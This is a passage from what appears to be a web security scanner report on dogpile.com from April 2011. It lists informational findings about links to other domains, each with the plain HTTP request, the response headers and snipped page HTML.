<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
</script>
<a id="icePage_FavoriteFetchesAd_QuickStartAddThis_AddThisLink" onclick="logClick(callback_server_url);return addthis_open(this, '', addthis_share_url , document.title)" href="http://www.addthis.com/bookmark.php?v=20">Bookmark and Share</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<div>
<img width="710" height="292" border="0" usemap="#aprilfools" src="http://ttl30d.images.infospace.com.edgesuite.net/search/images/201103/Arfie_AprilFools2.gif">
<map name="aprilfools">
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...

11.49. http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.infospaceinc.com/onlineprod/Overlap-DifferentEnginesDifferentResults.pdf
http://www.mercantila.com/

Request

GET /dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=311e2ea371e14a478092c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:45 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:45 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:45 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:44 GMT
Connection: close
Content-Length: 42311
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content="" />

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
about
how little search results overlap across the various search engines (less than 1%) and how
metasearch provides a better Web search experience.
<a href="http://www.infospaceinc.com/onlineprod/Overlap-DifferentEnginesDifferentResults.pdf">Click here</a>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.50. http://www.dogpile.com/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/add_dp_homepage_banner.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/add_dp_homepage_banner2.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ext_form_banner_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=1f4ce6b668524887a23bc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:37 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:37 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:37 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:37 GMT
Connection: close
Content-Length: 45668
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content="search, web, images, news, audio, mp3, shopping, message boards, multimedia">

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
</div>
<img id="icePage_DPHomePageBanner" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/add_dp_homepage_banner.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile Homepage Banner" style="border-width:0px;" />
<p class="optionInstructions">
...[SNIP]...
<td>
<img height="48" width="130" alt="Dogpile" class="image" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ext_form_banner_logo.gif/_iceUrlFlag=15?_IceUrl=true'/>
</td>
...[SNIP]...
</div>
<img id="icePage_DPHomePageBanner1" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/add_dp_homepage_banner2.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile Sidebar" style="border-width:0px;" />
<p class="optionInstructions">
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
                   <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
               </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.51. http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/preferences/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 16:58:06 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=0d789ad599844ecb8757c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:06 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:06 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:06 GMT
Connection: close
Content-Length: 51033
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content=" save searches, adult filter, languages"/>

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.52. http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 17:14:37 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=8604994ef54a4503a8ebc16a3af0cb01&ActionId=d3d176b0a927462ab6d9c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:37 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:37 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:37 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:36 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 51033

